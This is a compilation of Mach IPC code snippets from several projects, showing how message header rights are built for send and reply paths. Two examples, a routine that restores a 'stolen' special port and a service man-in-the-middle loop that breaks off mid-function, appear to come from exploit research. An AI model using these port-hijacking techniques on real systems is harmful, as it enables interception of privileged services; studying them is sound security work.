Example 1
File: send.c Project: ctos/bpi
void send_integer( mach_port_t destination, int i )
{
    kern_return_t err;
    struct integer_message message;

    message.head.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MAKE_SEND);
    message.head.msgh_size = sizeof( struct integer_message );
    message.head.msgh_local_port = MACH_PORT_NULL;
    message.head.msgh_remote_port = destination;


    message.type.msgt_name = MACH_MSG_TYPE_INTEGER_32;
    message.type.msgt_size = 32;
    message.type.msgt_number = 1;
    message.type.msgt_inline = TRUE;
    message.type.msgt_longform = FALSE;
    message.type.msgt_deallocate = FALSE;

    message.inline_integer = i;

    err = mach_msg( &(message.head), MACH_SEND_MSG, message.head.msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL );

    if( err == MACH_MSG_SUCCESS )
    {
        printf( "success: the message was queued\n" );
    }
    else
    {
        perror( "error: some unexpected error ocurred!\n");
    }

    return;
}
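For reference, a minimal receive-side sketch matching the typed (Mach 3 / GNU Mach) message sent above. It assumes the same struct integer_message layout as the example (head, type, inline_integer); the function name is illustrative and not part of the original project.

#include <stdio.h>
#include <mach.h>   /* GNU Mach convention; other Mach derivatives use <mach/mach.h> */

int receive_integer( mach_port_t source, int *value )
{
    kern_return_t err;
    struct integer_message message;

    /* Block until a message arrives on the receive right held for `source`. */
    err = mach_msg( &(message.head), MACH_RCV_MSG, 0,
                    sizeof( struct integer_message ), source,
                    MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL );

    if( err != MACH_MSG_SUCCESS )
    {
        printf( "error: mach_msg receive failed (0x%x)\n", err );
        return -1;
    }

    *value = message.inline_integer;
    return 0;
}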
Example 2
void Connection::exceptionSourceEventHandler()
{
    ReceiveBuffer buffer;

    mach_msg_header_t* header = readFromMachPort(m_exceptionPort, buffer);
    if (!header)
        return;

    // We've read the exception message. Now send it on to the real exception port.

    // The remote port should have a send-once right.
    ASSERT(MACH_MSGH_BITS_REMOTE(header->msgh_bits) == MACH_MSG_TYPE_MOVE_SEND_ONCE);

    // Now get the real exception port.
    mach_port_t exceptionPort = machExceptionPort();

    // First, get the complex bit from the source message.
    mach_msg_bits_t messageBits = header->msgh_bits & MACH_MSGH_BITS_COMPLEX;
    messageBits |= MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MOVE_SEND_ONCE);

    header->msgh_bits = messageBits;
    header->msgh_local_port = header->msgh_remote_port;
    header->msgh_remote_port = exceptionPort;

    // Now send along the message.
    kern_return_t kr = mach_msg(header, MACH_SEND_MSG, header->msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if (kr != KERN_SUCCESS) {
        LOG_ERROR("Failed to send message to real exception port. %s (%x)", mach_error_string(kr), kr);
        ASSERT_NOT_REACHED();
    }

    connectionDidClose();
}
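The header-bit handling above is the pattern most snippets on this page rely on. As a standalone illustration (not taken from WebKit): MACH_MSGH_BITS packs a remote and a local disposition into a single word, MACH_MSGH_BITS_REMOTE / MACH_MSGH_BITS_LOCAL extract them again, and MACH_MSGH_BITS_COMPLEX is a separate flag OR'ed in when the body carries descriptors.

#include <assert.h>
#include <mach/message.h>

static void header_bits_example(void)
{
    mach_msg_bits_t bits =
        MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);

    /* Both dispositions come back out unchanged. */
    assert(MACH_MSGH_BITS_REMOTE(bits) == MACH_MSG_TYPE_COPY_SEND);
    assert(MACH_MSGH_BITS_LOCAL(bits) == MACH_MSG_TYPE_MAKE_SEND_ONCE);

    /* The complex flag lives in a different part of the word, so it does
       not disturb either disposition. */
    bits |= MACH_MSGH_BITS_COMPLEX;
    assert(MACH_MSGH_BITS_REMOTE(bits) == MACH_MSG_TYPE_COPY_SEND);
}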
Example 3
File: send.c Project: ctos/bpi
void send(mach_port_t dest, int data)
{
	kern_return_t err;
	struct message mess;


	mess.head.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MAKE_SEND);
	mess.head.msgh_size = sizeof (struct message);
	mess.head.msgh_local_port = MACH_PORT_NULL;
	mess.head.msgh_remote_port = dest;

	mess.type.msgt_name = MACH_MSG_TYPE_INTEGER_32;
	mess.type.msgt_size = 32;
	mess.type.msgt_number = 1;
	mess.type.msgt_inline = TRUE;
	mess.type.msgt_longform = FALSE;
	mess.type.msgt_deallocate = FALSE;

	mess.integer = data;

	err = mach_msg_send(&(mess.head));
	if (err == MACH_MSG_SUCCESS)
	{
		printf("SUCCESS: THE MESSAGE WAS SENT.\n");
	}
}
Example 4
//------------------------------------------------------------------------------
// __NoMoreSenders
//------------------------------------------------------------------------------
Boolean __NoMoreSenders(mach_msg_header_t *request, mach_msg_header_t *reply)
{
	mach_no_senders_notification_t	*Request = (mach_no_senders_notification_t *)request;
	mig_reply_error_t               *Reply   = (mig_reply_error_t *)reply;

	reply->msgh_bits        = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(request->msgh_bits), 0);
	reply->msgh_remote_port = request->msgh_remote_port;
	reply->msgh_size        = sizeof(mig_reply_error_t);	// Minimal size: update as needed
	reply->msgh_local_port  = MACH_PORT_NULL;
	reply->msgh_id          = request->msgh_id + 100;

	if ((Request->not_header.msgh_id > MACH_NOTIFY_LAST) ||
	    (Request->not_header.msgh_id < MACH_NOTIFY_FIRST)) {
		Reply->NDR     = NDR_record;
		Reply->RetCode = MIG_BAD_ID;
		return FALSE;	// if this is not a notification message 
	}

	switch (Request->not_header.msgh_id) {
		case MACH_NOTIFY_NO_SENDERS :
			Reply->Head.msgh_bits		= 0;
			Reply->Head.msgh_remote_port	= MACH_PORT_NULL;
			Reply->RetCode			= KERN_SUCCESS;
			return TRUE;
		default :
			break;
	}

	Reply->NDR     = NDR_record;
	Reply->RetCode = MIG_BAD_ID;
	return FALSE;	// if this is not a notification we are handling
}
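A hedged sketch of how a server arms the notification that a handler like __NoMoreSenders processes: it asks the kernel to deliver MACH_NOTIFY_NO_SENDERS once the last send right for the service port goes away. The port name here is a placeholder.

#include <mach/mach.h>

kern_return_t arm_no_senders(mach_port_t service_port)
{
	mach_port_t previous = MACH_PORT_NULL;

	/* sync == 0: notify as soon as the extant send-right count reaches zero.
	   The notification is delivered to service_port itself through a made
	   send-once right, so the normal receive loop will pick it up. */
	return mach_port_request_notification(mach_task_self(),
	                                      service_port,
	                                      MACH_NOTIFY_NO_SENDERS,
	                                      0,
	                                      service_port,
	                                      MACH_MSG_TYPE_MAKE_SEND_ONCE,
	                                      &previous);
}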
Example 5
static void encode_reply(mig_reply_error_t *reply, mach_msg_header_t *hdr, int code) {
	mach_msg_header_t *rh = &reply->Head;
	rh->msgh_bits = MACH_MSGH_BITS (MACH_MSGH_BITS_REMOTE (hdr->msgh_bits), 0);
	rh->msgh_remote_port = hdr->msgh_remote_port;
	rh->msgh_size = (mach_msg_size_t) sizeof (mig_reply_error_t);
	rh->msgh_local_port = MACH_PORT_NULL;
	rh->msgh_id = hdr->msgh_id + 100;
	reply->NDR = NDR_record;
	reply->RetCode = code;
}
Example 6
void MachRunLoopServer::oneRequest(const Message &request)
{
	if (!handle(request, mReplyMessage)) {	// MIG dispatch failed
		secdebug("machrls", "MachRunLoopServer dispatch failed");
	} else {
		// MIG dispatch handled the call. Send reply back to caller.
		mReplyMessage.send((MACH_MSGH_BITS_REMOTE(mReplyMessage.bits()) == MACH_MSG_TYPE_MOVE_SEND_ONCE) ?
			MACH_SEND_MSG :	MACH_SEND_MSG|MACH_SEND_TIMEOUT);
	}
	active().releaseDeferredAllocations();
}
Example 7
static boolean_t handle_server_message(struct DummyMsg_t *requestMsg, struct DummyMsg_t *replyMsg) {
    mig_reply_error_t * request = (mig_reply_error_t *)requestMsg;
    mig_reply_error_t *	reply = (mig_reply_error_t *)replyMsg;
    mach_msg_return_t r = MACH_MSG_SUCCESS;
    mach_msg_options_t options = 0;

    boolean_t handled = iHaxGamezHelper_server((mach_msg_header_t *)request, (mach_msg_header_t *)reply);
    //if (ERR_FILE) fprintf(ERR_FILE, "Got back %d\n", handled);
    if (handled) {
    /* Copied from Libc/mach/mach_msg.c:mach_msg_server_once(): Start */
        if (!(reply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
            if (reply->RetCode == MIG_NO_REPLY)
                reply->Head.msgh_remote_port = MACH_PORT_NULL;
            else if ((reply->RetCode != KERN_SUCCESS) &&
                     (request->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
                /* destroy the request - but not the reply port */
                request->Head.msgh_remote_port = MACH_PORT_NULL;
                mach_msg_destroy(&request->Head);
            }
        }
        /*
         *	We don't want to block indefinitely because the client
         *	isn't receiving messages from the reply port.
         *	If we have a send-once right for the reply port, then
         *	this isn't a concern because the send won't block.
         *	If we have a send right, we need to use MACH_SEND_TIMEOUT.
         *	To avoid falling off the kernel's fast RPC path unnecessarily,
         *	we only supply MACH_SEND_TIMEOUT when absolutely necessary.
         */
        if (reply->Head.msgh_remote_port != MACH_PORT_NULL) {
            r = mach_msg(&reply->Head,
                         (MACH_MSGH_BITS_REMOTE(reply->Head.msgh_bits) ==
                          MACH_MSG_TYPE_MOVE_SEND_ONCE) ?
                         MACH_SEND_MSG|options :
                         MACH_SEND_MSG|MACH_SEND_TIMEOUT|options,
                         reply->Head.msgh_size, 0, MACH_PORT_NULL,
                         MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
            if ((r != MACH_SEND_INVALID_DEST) &&
                (r != MACH_SEND_TIMED_OUT))
                goto done_once;
        }
        if (reply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)
            mach_msg_destroy(&reply->Head);
     done_once:
        /* Copied from Libc/mach/mach_msg.c:mach_msg_server_once(): End */
        ;
    }
    return handled;
    
}
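A hedged sketch of the receive loop that would feed handle_server_message above, assuming struct DummyMsg_t (defined in the original source) is large enough to hold both the incoming request and the reply that iHaxGamezHelper_server builds.

#include <string.h>
#include <mach/mach.h>

static void serve_one_request(mach_port_t server_port)
{
    struct DummyMsg_t request, reply;
    memset(&request, 0, sizeof(request));
    memset(&reply, 0, sizeof(reply));

    /* Receive a single request into the oversized buffer... */
    kern_return_t kr = mach_msg((mach_msg_header_t *)&request,
                                MACH_RCV_MSG, 0, sizeof(request),
                                server_port, MACH_MSG_TIMEOUT_NONE,
                                MACH_PORT_NULL);
    if (kr != MACH_MSG_SUCCESS)
        return;

    /* ...then let the handler above dispatch it and send any reply. */
    (void)handle_server_message(&request, &reply);
}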
Example 8
/* -----------------------------------------------------------------------------
----------------------------------------------------------------------------- */
void
server_handle_request(CFMachPortRef port, void *msg, CFIndex size, void *info)
{
    mach_msg_return_t 	r;
    mach_msg_header_t *	request = (mach_msg_header_t *)msg;
    mach_msg_header_t *	reply;
    char		reply_s[128] __attribute__ ((aligned (4)));		// Wcast-align fix - force alignment

    if (process_notification(request) == FALSE) {
		if (_pppcontroller_subsystem.maxsize > sizeof(reply_s)) {
			syslog(LOG_ERR, "PPPController: %d > %ld",
				_pppcontroller_subsystem.maxsize, sizeof(reply_s));
			reply = (mach_msg_header_t *)
			malloc(_pppcontroller_subsystem.maxsize);
		}
		else {
			reply = ALIGNED_CAST(mach_msg_header_t *)reply_s;
		}
		if (pppcontroller_server(request, reply) == FALSE) {
			syslog(LOG_INFO, "unknown message ID (%d) received",
			   request->msgh_id);
			mach_msg_destroy(request);
		}
		else {
			int		options;

			options = MACH_SEND_MSG;
			if (MACH_MSGH_BITS_REMOTE(reply->msgh_bits) == MACH_MSG_TYPE_MOVE_SEND) {
				options |= MACH_SEND_TIMEOUT;
			}
			r = mach_msg(reply,
				 options,
				 reply->msgh_size,
				 0,
				 MACH_PORT_NULL,
				 MACH_MSG_TIMEOUT_NONE,
				 MACH_PORT_NULL);
			if (r != MACH_MSG_SUCCESS) {
				syslog(LOG_INFO, "PPPController: mach_msg(send): %s", 
					mach_error_string(r));
				mach_msg_destroy(reply);
			}
		}
		if (reply != ALIGNED_CAST(mach_msg_header_t *)reply_s) {
			free(reply);
		}
    }
    return;
}
Example 9
void PAL_DispatchException(PCONTEXT pContext, PEXCEPTION_RECORD pExRecord)
{

    MSG_SET_THREAD MsgSet;
    kern_return_t MachRet;
    EXCEPTION_POINTERS pointers;

    pointers.ExceptionRecord = pExRecord;
    pointers.ContextRecord = pContext;

    // Raise the exception
    SEHRaiseException(&pointers, 0);

    // We need to send a message to the worker thread so that it can set our thread context

    // Set up the header
    MsgSet.m_MsgHdr.msgh_size = sizeof(MsgSet);
    MsgSet.m_MsgHdr.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MAKE_SEND|MACH_MSG_TYPE_MOVE_RECEIVE); // Simple Message
    MsgSet.m_MsgHdr.msgh_remote_port = s_ExceptionPort; // Send, dest port
    MsgSet.m_MsgHdr.msgh_local_port = MACH_PORT_NULL;   // We're not expecting a msg back
    MsgSet.m_MsgHdr.msgh_id = SET_THREAD_MESSAGE_ID; // Message ID
    MsgSet.m_MsgHdr.msgh_reserved = 0; // Not used

    // Setup the thread and thread context
    MsgSet.m_ThreadPort = mach_thread_self();
    MsgSet.m_ThreadContext = *pContext;

    // Send the message to the exception port
    MachRet = mach_msg(&MsgSet.m_MsgHdr,
                       MACH_SEND_MSG,
                       MsgSet.m_MsgHdr.msgh_size,
                       0,
                       MACH_PORT_NULL,
                       MACH_MSG_TIMEOUT_NONE,
                       MACH_PORT_NULL);

    if (MachRet != KERN_SUCCESS)
    {
        UTIL_SetLastErrorFromMach(MachRet);
        ExitProcess(GetLastError());
    }

    // Make sure we don't do anything
    while(1)
    {
        sched_yield();
    }
}
Example 10
void
exception_raise_continue_fast(
	ipc_port_t reply_port,
	ipc_kmsg_t kmsg)
{
	ipc_thread_t self = current_thread();
	kern_return_t kr;

	assert(ip_active(reply_port));
	assert(reply_port == self->ith_port);
	assert(reply_port == (ipc_port_t) kmsg->ikm_header.msgh_remote_port);
	assert(MACH_MSGH_BITS_REMOTE(kmsg->ikm_header.msgh_bits) ==
						MACH_MSG_TYPE_PORT_SEND_ONCE);

	/*
	 *	Release the send-once right (from the message header)
	 *	and the saved reference (from self->ith_port).
	 */

	reply_port->ip_sorights--;
	ip_release(reply_port);
	ip_release(reply_port);
	ip_unlock(reply_port);

	/*
	 *	Consume the reply message.
	 */

	kr = exception_parse_reply(kmsg);
	if (kr == KERN_SUCCESS) {
		thread_exception_return();
		/*NOTREACHED*/
	}

	if (self->ith_exc != KERN_SUCCESS) {
		exception_try_task(self->ith_exc,
				   self->ith_exc_code,
				   self->ith_exc_subcode);
		/*NOTREACHED*/
	}

	exception_no_server();
	/*NOTREACHED*/
}
Example 11
STATIC void
server_handle_request(CFMachPortRef port, void * msg, CFIndex size, void * info)
{
    mach_msg_return_t 	r;
    mach_msg_header_t *	request = (mach_msg_header_t *)msg;
    mach_msg_header_t *	reply;
    char		reply_s[eapolcfg_auth_subsystem.maxsize];

    if (process_notification(request) == FALSE) {
	reply = (mach_msg_header_t *)reply_s;
	if (eapolcfg_auth_server(request, reply) == FALSE) {
	    syslog(LOG_NOTICE,
		   "eapolcfg_auth: unknown message ID (%d)",
		   request->msgh_id);
	    mach_msg_destroy(request);
	}
	else {
	    int		options;

	    S_handled_request = TRUE;

	    options = MACH_SEND_MSG;
	    if (MACH_MSGH_BITS_REMOTE(reply->msgh_bits)
                != MACH_MSG_TYPE_MOVE_SEND_ONCE) {
		options |= MACH_SEND_TIMEOUT;
	    }
	    r = mach_msg(reply,
			 options,
			 reply->msgh_size,
			 0,
			 MACH_PORT_NULL,
			 MACH_MSG_TIMEOUT_NONE,
			 MACH_PORT_NULL);
	    if (r != MACH_MSG_SUCCESS) {
		syslog(LOG_NOTICE, "eapolcfg_auth: mach_msg(send): %s", 
		       mach_error_string(r));
		mach_msg_destroy(reply);
	    }
	}
    }
    return;
}
Example 12
static void protBuildReply(protReplyStruct *reply,
                           protRequestStruct *request,
                           kern_return_t ret_code)
{
  mach_msg_size_t state_size;
  reply->Head.msgh_bits =
    MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(request->Head.msgh_bits), 0);
  reply->Head.msgh_remote_port = request->Head.msgh_remote_port;
  reply->Head.msgh_local_port = MACH_PORT_NULL;
  reply->Head.msgh_reserved = 0;
  reply->Head.msgh_id = request->Head.msgh_id + 100;
  reply->NDR = request->NDR;
  reply->RetCode = ret_code;
  reply->flavor = request->flavor;
  reply->new_stateCnt = request->old_stateCnt;
  state_size = reply->new_stateCnt * sizeof(natural_t);
  AVER(sizeof(reply->new_state) >= state_size);
  memcpy(reply->new_state, request->old_state, state_size);
  /* If you use sizeof(reply) for reply->Head.msgh_size then the state
     gets ignored. */
  reply->Head.msgh_size = offsetof(protReplyStruct, new_state) + state_size;
}
Example 13
mach_port_t recover_shared_port_parent() {
  kern_return_t err;

  // restore the special port for ourselves
  err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, saved_special_port);
  MACH_ERR("parent restoring special port", err);

  // wait for a message from the child on the shared port
  simple_msg_rcv_t msg = {0};
  err = mach_msg(&msg.header,
                 MACH_RCV_MSG,
                 0,
                 sizeof(msg),
                 shared_port_parent,
                 MACH_MSG_TIMEOUT_NONE,
                 MACH_PORT_NULL);
  MACH_ERR("parent receiving child hello message", err);

  LOG("parent received hello message from child");

  // send the special port to our child over the hello message's reply port
  port_msg_send_t special_port_msg = {0};

  special_port_msg.header.msgh_size        = sizeof(special_port_msg);
  special_port_msg.header.msgh_local_port  = MACH_PORT_NULL;
  special_port_msg.header.msgh_remote_port = msg.header.msgh_remote_port;
  special_port_msg.header.msgh_bits        = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(msg.header.msgh_bits), 0) | MACH_MSGH_BITS_COMPLEX;
  special_port_msg.body.msgh_descriptor_count = 1;

  special_port_msg.port.name        = saved_special_port;
  special_port_msg.port.disposition = MACH_MSG_TYPE_COPY_SEND;
  special_port_msg.port.type        = MACH_MSG_PORT_DESCRIPTOR;

  err = mach_msg_send(&special_port_msg.header);
  MACH_ERR("parent sending special port back to child", err);

  return shared_port_parent;
}
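A hedged sketch of the child side of the exchange above: it waits on the reply port it named in its hello message and pulls the special port out of the single port descriptor. The port_msg_rcv_t layout is an assumption (header, body, one port descriptor, trailer), mirroring port_msg_send_t.

#include <mach/mach.h>

typedef struct {
  mach_msg_header_t          header;
  mach_msg_body_t            body;
  mach_msg_port_descriptor_t port;
  mach_msg_trailer_t         trailer;
} port_msg_rcv_t;

mach_port_t receive_special_port(mach_port_t reply_port) {
  port_msg_rcv_t msg = {0};

  kern_return_t err = mach_msg(&msg.header,
                               MACH_RCV_MSG,
                               0,
                               sizeof(msg),
                               reply_port,
                               MACH_MSG_TIMEOUT_NONE,
                               MACH_PORT_NULL);
  if (err != KERN_SUCCESS) {
    return MACH_PORT_NULL;
  }

  /* The kernel translated the COPY_SEND descriptor into a send right
     named in this task's IPC space. */
  return msg.port.name;
}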
Example 14
__private_extern__
boolean_t
config_demux(mach_msg_header_t *request, mach_msg_header_t *reply)
{
	Boolean				processed = FALSE;

	/*
	 * (attempt to) process SCDynamicStore requests.
	 */
	processed = config_server(request, reply);
	if (processed) {
		return TRUE;
	}

	/*
	 * (attempt to) process (NO MORE SENDERS) notification messages.
	 */
	processed = notify_server(request, reply);
	if (processed) {
		return TRUE;
	}

	/*
	 * unknown message ID, log and return an error.
	 */
	SCLog(TRUE, LOG_ERR, CFSTR("config_demux(): unknown message ID (%d) received"), request->msgh_id);
	reply->msgh_bits        = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(request->msgh_bits), 0);
	reply->msgh_remote_port = request->msgh_remote_port;
	reply->msgh_size        = sizeof(mig_reply_error_t);	/* Minimal size */
	reply->msgh_local_port  = MACH_PORT_NULL;
	reply->msgh_id          = request->msgh_id + 100;
	((mig_reply_error_t *)reply)->NDR = NDR_record;
	((mig_reply_error_t *)reply)->RetCode = MIG_BAD_ID;

	return FALSE;
}
Example 15
static void ExceptionThread(mach_port_t port)
{
	Common::SetCurrentThreadName("Mach exception thread");
	#pragma pack(4)
	struct
	{
		mach_msg_header_t Head;
		NDR_record_t NDR;
		exception_type_t exception;
		mach_msg_type_number_t codeCnt;
		int64_t code[2];
		int flavor;
		mach_msg_type_number_t old_stateCnt;
		natural_t old_state[x86_THREAD_STATE64_COUNT];
		mach_msg_trailer_t trailer;
	} msg_in;

	struct
	{
		mach_msg_header_t Head;
		NDR_record_t NDR;
		kern_return_t RetCode;
		int flavor;
		mach_msg_type_number_t new_stateCnt;
		natural_t new_state[x86_THREAD_STATE64_COUNT];
	} msg_out;
	#pragma pack()
	memset(&msg_in, 0xee, sizeof(msg_in));
	memset(&msg_out, 0xee, sizeof(msg_out));
	mach_msg_header_t *send_msg = nullptr;
	mach_msg_size_t send_size = 0;
	mach_msg_option_t option = MACH_RCV_MSG;
	while (true)
	{
		// If this isn't the first run, send the reply message.  Then, receive
		// a message: either a mach_exception_raise_state RPC due to
		// thread_set_exception_ports, or MACH_NOTIFY_NO_SENDERS due to
		// mach_port_request_notification.
		CheckKR("mach_msg_overwrite", mach_msg_overwrite(send_msg, option, send_size, sizeof(msg_in), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL, &msg_in.Head, 0));

		if (msg_in.Head.msgh_id == MACH_NOTIFY_NO_SENDERS)
		{
			// the other thread exited
			mach_port_destroy(mach_task_self(), port);
			return;
		}

		if (msg_in.Head.msgh_id != 2406)
		{
			PanicAlert("unknown message received");
			return;
		}

		if (msg_in.flavor != x86_THREAD_STATE64)
		{
			PanicAlert("unknown flavor %d (expected %d)", msg_in.flavor, x86_THREAD_STATE64);
			return;
		}

		x86_thread_state64_t *state = (x86_thread_state64_t *) msg_in.old_state;

		bool ok = JitInterface::HandleFault((uintptr_t) msg_in.code[1], state);

		// Set up the reply.
		msg_out.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(msg_in.Head.msgh_bits), 0);
		msg_out.Head.msgh_remote_port = msg_in.Head.msgh_remote_port;
		msg_out.Head.msgh_local_port = MACH_PORT_NULL;
		msg_out.Head.msgh_id = msg_in.Head.msgh_id + 100;
		msg_out.NDR = msg_in.NDR;
		if (ok)
		{
			msg_out.RetCode = KERN_SUCCESS;
			msg_out.flavor = x86_THREAD_STATE64;
			msg_out.new_stateCnt = x86_THREAD_STATE64_COUNT;
			memcpy(msg_out.new_state, msg_in.old_state, x86_THREAD_STATE64_COUNT * sizeof(natural_t));
		}
		else
		{
			// Pass the exception to the next handler (debugger or crash).
			msg_out.RetCode = KERN_FAILURE;
			msg_out.flavor = 0;
			msg_out.new_stateCnt = 0;
		}
		msg_out.Head.msgh_size = offsetof(__typeof__(msg_out), new_state) + msg_out.new_stateCnt * sizeof(natural_t);

		send_msg = &msg_out.Head;
		send_size = msg_out.Head.msgh_size;
		option |= MACH_SEND_MSG;
	}
}
Example 16
ipc_kmsg_t
ipc_kobject_server(
	ipc_kmsg_t	request)
{
	mach_msg_size_t reply_size;
	ipc_kmsg_t reply;
	kern_return_t kr;
	ipc_port_t *destp;
	mach_msg_format_0_trailer_t *trailer;
	register mig_hash_t *ptr;

	/*
	 * Find out corresponding mig_hash entry if any
	 */
	{
	    register int key = request->ikm_header->msgh_id;
	    register int i = MIG_HASH(key);
	    register int max_iter = mig_table_max_displ;
	
	    do
		ptr = &mig_buckets[i++ % MAX_MIG_ENTRIES];
	    while (key != ptr->num && ptr->num && --max_iter);

	    if (!ptr->routine || key != ptr->num) {
	        ptr = (mig_hash_t *)0;
		reply_size = mig_reply_size;
	    } else {
		reply_size = ptr->size;
#if	MACH_COUNTER
		ptr->callcount++;
#endif
	    }
	}

	/* round up for trailer size */
        reply_size += MAX_TRAILER_SIZE;
	reply = ipc_kmsg_alloc(reply_size);

	if (reply == IKM_NULL) {
		printf("ipc_kobject_server: dropping request\n");
		ipc_kmsg_destroy(request);
		return IKM_NULL;
	}

	/*
	 * Initialize reply message.
	 */
	{
#define	InP	((mach_msg_header_t *) request->ikm_header)
#define	OutP	((mig_reply_error_t *) reply->ikm_header)

	    /* 
	     * MIG should really assure no data leakage -
	     * but until it does, pessimistically zero the
	     * whole reply buffer.
	     */
	    bzero((void *)OutP, reply_size);

	    OutP->NDR = NDR_record;
	    OutP->Head.msgh_size = sizeof(mig_reply_error_t);

	    OutP->Head.msgh_bits =
		MACH_MSGH_BITS_SET(MACH_MSGH_BITS_LOCAL(InP->msgh_bits), 0, 0, 0);
	    OutP->Head.msgh_remote_port = InP->msgh_local_port;
	    OutP->Head.msgh_local_port = MACH_PORT_NULL;
	    OutP->Head.msgh_voucher_port = MACH_PORT_NULL;
	    OutP->Head.msgh_id = InP->msgh_id + 100;

#undef	InP
#undef	OutP
	}

	/*
	 * Find the routine to call, and call it
	 * to perform the kernel function
	 */
	{
	    if (ptr) {	
		(*ptr->routine)(request->ikm_header, reply->ikm_header);
		kernel_task->messages_received++;
	    }
	    else {
		if (!ipc_kobject_notify(request->ikm_header, reply->ikm_header)){
#if	MACH_IPC_TEST
		    printf("ipc_kobject_server: bogus kernel message, id=%d\n",
			request->ikm_header->msgh_id);
#endif	/* MACH_IPC_TEST */
		    _MIG_MSGID_INVALID(request->ikm_header->msgh_id);

		    ((mig_reply_error_t *) reply->ikm_header)->RetCode
			= MIG_BAD_ID;
		}
		else
		  kernel_task->messages_received++;
	    }
	    kernel_task->messages_sent++;
	}

	/*
	 *	Destroy destination. The following code differs from
	 *	ipc_object_destroy in that we release the send-once
	 *	right instead of generating a send-once notification
	 * 	(which would bring us here again, creating a loop).
	 *	It also differs in that we only expect send or
	 *	send-once rights, never receive rights.
	 *
	 *	We set msgh_remote_port to IP_NULL so that the kmsg
	 *	destroy routines don't try to destroy the port twice.
	 */
	destp = (ipc_port_t *) &request->ikm_header->msgh_remote_port;
	switch (MACH_MSGH_BITS_REMOTE(request->ikm_header->msgh_bits)) {
		case MACH_MSG_TYPE_PORT_SEND:
		    ipc_port_release_send(*destp);
		    break;
		
		case MACH_MSG_TYPE_PORT_SEND_ONCE:
		    ipc_port_release_sonce(*destp);
		    break;
		
		default:
		    panic("ipc_kobject_server: strange destination rights");
	}
	*destp = IP_NULL;

	/*
	 *	Destroy voucher.  The kernel MIG servers never take ownership
	 *	of vouchers sent in messages.  Swallow any such rights here.
	 */
	if (IP_VALID(request->ikm_voucher)) {
		assert(MACH_MSG_TYPE_PORT_SEND ==
		       MACH_MSGH_BITS_VOUCHER(request->ikm_header->msgh_bits));
		ipc_port_release_send(request->ikm_voucher);
		request->ikm_voucher = IP_NULL;
	}

        if (!(reply->ikm_header->msgh_bits & MACH_MSGH_BITS_COMPLEX) &&
           ((mig_reply_error_t *) reply->ikm_header)->RetCode != KERN_SUCCESS)
	 	kr = ((mig_reply_error_t *) reply->ikm_header)->RetCode;
	else
		kr = KERN_SUCCESS;

	if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
		/*
		 *	The server function is responsible for the contents
		 *	of the message.  The reply port right is moved
		 *	to the reply message, and we have deallocated
		 *	the destination port right, so we just need
		 *	to free the kmsg.
		 */
		ipc_kmsg_free(request);

	} else {
		/*
		 *	The message contents of the request are intact.
		 *	Destroy everything except the reply port right,
		 *	which is needed in the reply message.
		 */
		request->ikm_header->msgh_local_port = MACH_PORT_NULL;
		ipc_kmsg_destroy(request);
	}

	if (kr == MIG_NO_REPLY) {
		/*
		 *	The server function will send a reply message
		 *	using the reply port right, which it has saved.
		 */

		ipc_kmsg_free(reply);

		return IKM_NULL;
	} else if (!IP_VALID((ipc_port_t)reply->ikm_header->msgh_remote_port)) {
		/*
		 *	Can't queue the reply message if the destination
		 *	(the reply port) isn't valid.
		 */

		ipc_kmsg_destroy(reply);

		return IKM_NULL;
	}

 	trailer = (mach_msg_format_0_trailer_t *)
		((vm_offset_t)reply->ikm_header + (int)reply->ikm_header->msgh_size);

 	trailer->msgh_sender = KERNEL_SECURITY_TOKEN;
 	trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
 	trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;

	return reply;
}
Example 17
void do_service_mitm(mach_port_t real_service_port, mach_port_t replacer_portset) {
  mach_msg_size_t max_request_size = 0x10000;
  mach_msg_header_t* request = malloc(max_request_size);
  
  for(;;) {
    memset(request, 0, max_request_size);
    kern_return_t err = mach_msg(request,
                                 MACH_RCV_MSG |
                                 MACH_RCV_LARGE, // leave larger messages in the queue
                                 0,
                                 max_request_size,
                                 replacer_portset,
                                 0,
                                 0);
    
    if (err == MACH_RCV_TOO_LARGE) {
      // bump up the buffer size
      mach_msg_size_t new_size = request->msgh_size + 0x1000;
      request = realloc(request, new_size);
      // try to receive again
      continue;
    }
    
    if (err != KERN_SUCCESS) {
      printf("error receiving on port set: %s\n", mach_error_string(err));
      exit(EXIT_FAILURE);
    }
    
    got_replaced_with = request->msgh_local_port;
    
    printf("got a request, fixing it up...\n");
    
    // fix up the message such that it can be forwarded:
    
    // get the rights we were sent for each port the header
    mach_port_right_t remote = MACH_MSGH_BITS_REMOTE(request->msgh_bits);
    mach_port_right_t voucher = MACH_MSGH_BITS_VOUCHER(request->msgh_bits);
    
    // fixup the header ports:
    // swap the remote port we received into the local port we'll forward
    // this means we're only mitm'ing in one direction - we could also
    // intercept these replies if necessary
    request->msgh_local_port = request->msgh_remote_port;
    request->msgh_remote_port = real_service_port;
    // voucher port stays the same
    
    int is_complex = MACH_MSGH_BITS_IS_COMPLEX(request->msgh_bits);
    
    // (remote, local, voucher)
